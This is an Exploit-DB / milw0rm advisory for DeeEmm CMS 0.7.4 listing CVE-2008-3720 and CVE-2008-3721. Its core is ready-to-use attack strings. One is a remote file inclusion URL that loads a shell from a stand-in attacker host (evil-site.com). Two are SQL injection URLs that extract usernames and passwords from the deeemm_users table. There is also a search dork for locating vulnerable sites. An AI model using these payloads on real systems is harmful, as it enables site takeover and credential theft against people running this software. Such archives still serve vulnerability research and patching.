deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities
Author: Khashayar Fereidani
type: webapps
platform: php
port:
date_added: 2008-08-14
date_updated: 2016-12-21
verified: 1
codes: OSVDB-47603;CVE-2008-3721;OSVDB-47602;CVE-2008-3720
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comdmcms_074.tar
#####################################################################################
#### DeeEmm CMS Sql Injection/Rfi ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Script Download : http://surfnet.dl.sourceforge.net/sourceforge/dmcms/dmcms_074.tar.gz
# #
#Home Page : www.deeemm.com #
# #
#DORK : "DeeEmm CMS" #
# #
#####################################################################################
# [Rfi] #
# #
#http://Site/user_language.php?INDM=r3d.w0rm&language_dir=http://evil-site.com/shell.txt?
# #
# [Sql Injection] #
# #
#http://Site/index.php?page=media`+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users/* #
#http://Site/index.php?page=media&id=-99999+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
# milw0rm.com [2008-08-15]